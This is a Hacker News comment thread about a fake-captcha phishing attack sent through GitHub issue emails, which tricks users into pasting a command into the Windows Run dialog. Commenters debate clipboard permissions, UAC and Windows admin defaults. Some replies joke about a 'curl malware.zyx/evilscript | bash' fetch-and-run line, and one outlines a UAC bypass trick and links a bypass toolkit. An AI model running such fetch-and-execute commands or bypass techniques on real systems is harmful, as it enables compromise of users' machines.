Comment by keyle

Comment by keyle 10 months ago

28 replies

View on Hacker News

      Press Win+R, CTRL+V <enter>
From captcha to gotcha.

I could see junior developers falling for this. Hey it's Github, it's legit right? We get security notifications every second months about some lib everyone uses etc.

      "Oh look, captcha by running code, how neat!"
I don't think webpages should be able to fill your copy/paste buffer from a click without a content preview. They made it requiring a user action, such as clicking, thinking that would solve the problem but it's still too weak. That's problem number 1.

People need to stop actioning any links from emails and/or believing that any content in an email has legitimacy. It doesn't. That's problem number 2.

Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

Github might need to stop people putting links in issues without being checked by automated services that can validate the content as remotely legitimate. They're sending this stuff to people's email, don't tell me they're not aware this could be used for fishing! That's cyber security 101, in 2015.

Finally, Github, in being unable to act on the above, may need to better strip what they email to people, and essentially behave more like banks "you have a new issue in this repository..." and that's that. You then go there, there is no message, ok great. That would have taken care of this issue...

It seems Github needs to graduate a bit here.

gerdesj 10 months ago

"I could see junior developers falling for this" - I can see all sorts fucking up, not just juniors. It is the way of things.

"I don't think that...". I think that you have to train your troops effectively in what is harmfull.

"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. Its been a long running project but I will succeed.

Reply View 0 replies
justsomehnguy 10 months ago

> Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

sigh It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates what it was taken under a user with admin privileges and UAC disabled.

Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

Reply View 5 replies
  • koolba 10 months ago

    > … by 1 like in curl malware.zyx/evilscript | bash.

    Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.

    Reply View 0 replies
  • chii 10 months ago

    > it was taken under a user with admin privileges and UAC disabled.

    you will have to accept that users either ask this UAC to be turned off, or it gets turned off by the original installer of the windows for the user (presumably non-technical user).

    It's like telling traffic accident sufferers that they should've put on a seatbelt. True, but pointless.

    Reply View 1 reply
    • justsomehnguy 10 months ago

      > you will have to accept that users either ask this UAC to be turned off

      Running with UAC disabled under an admin account?

      That's not only a lack of a seatbelt, but wearing a flip-flops too.

      And I'm eating my dogfood too, I'm running under a regular user since migrated from Vista, both on personal and work devices. Sometimes it's PITA, sure, but it's manageable.

      Reply View 0 replies
  • rl3 10 months ago

    >Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

    Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.

    Reply View 1 reply
    • koolba 10 months ago

      Glad I’m not the only one thinking about POSIX compliance!

      Reply View 0 replies
ocdtrekkie 10 months ago

I've started disabling the Run dialog for non-technical users, but unfortunately a GitHub attack targets users who likely have a real use for it sometimes.

The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.

Reply View 2 replies
  • chii 10 months ago

    > The clipboard strategy feels like it should be easy to block too

    yea, the browser should actually have each site ask for permission to modify the clipboard imho.

    Reply View 1 reply
    • bradjohnson 10 months ago

      That might add another step but I think it is unlikely to help reduce the number of victims. If someone is willing to bring up the run prompt and paste whatever they have in the clipboard they are also likely to be social engineered into clicking yes on a dialog that tells them to allow clipboard modification.

      Reply View 0 replies
rpigab 10 months ago

This captcha is so bad... I'm gonna automate the solving of this captcha so whenever my browser shows me "Press Win+R, CTRL+V <enter>", it automatically runs cmd.exe with the clipboard content so I can get to the site content faster and with no interruption.

Yes, I'm a 10X Windows user.

Reply View 0 replies
Dalewyn 10 months ago

>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

You say it's a problem, I say it is a virtue.

We can "root" Windows because we are root, specifically a user in the Administrators group because the first user account configured by Windows Setup is always an administrator account.

This is a virtue. We can do whatever we want with the computer we own and use. This is freedom par excellence that literally every other operating system family today wishes they could do without getting shouted down.

In an era of increasingly locked down operating systems that prevent us from truly owning our computers, administering them, Windows just lets us do that. I hope to god this never changes.

Reply View 15 replies
  • AdieuToLogic 10 months ago

    >>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

    > We can do whatever we want with the computer we own and use.

    There is a difference between what an owner of a computer can and should be able to do, verses what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.

    MS Windows has a poor history of being able to do either.

    Reply View 10 replies
    • Dalewyn 10 months ago

      Remember the old saying: With great power comes great responsibility.

      Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.

      Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.

      Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.

      Once more: I hope to god this never changes.

      Reply View 9 replies
      • nativeit 10 months ago

        This is a wild take. Would you mind expanding a bit on the oppressive, locked down ecosystem that’s choking the free expression of Linux users?

        Reply View 6 replies
      • [removed] 10 months ago
        [deleted]
        Reply View 0 replies
      • [removed] 10 months ago
        [deleted]
        Reply View 0 replies
  • darby_nine 10 months ago

    > This is a virtue. We can do whatever we want with the computer we own and use.

    You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.

    Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.

    Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.

    Reply View 3 replies
    • lyu07282 10 months ago

      > At least, not without intentionally opting into it.

      just to clarify in Windows, users with administrative privileges will in theory still ask the user to opt-in every time before any process is elevated to administrative rights. Its just that Windows security is so awful that people have found many different creative ways around it over the years, but those are (sometimes) getting patched by Microsoft so they are considered "bugs".

      For example a process stores its executable path in memory writable by itself, so you could start a process that replaces its executable string to "C:\Windows\explorer.exe" and it would (for whatever reason) bypass the "ask for administrative rights" dialog popup. This is the sort of "security" that Windows is built around to its very core.

      https://github.com/hfiref0x/UACME

      > "This tool shows ONLY popular UAC bypass method used by malware, and re-implement some of them in a different way improving original concepts. *There are different, not yet known to the general public, methods. Be aware of this;*"

      (also i think you are responding to a troll btw)

      Reply View 2 replies
      • Dalewyn 10 months ago

        >(also i think you are responding to a troll btw)

        You would be wrong.

        Reply View 1 reply
        • lyu07282 10 months ago

          thats exactly what a troll would say though :p

          Reply View 0 replies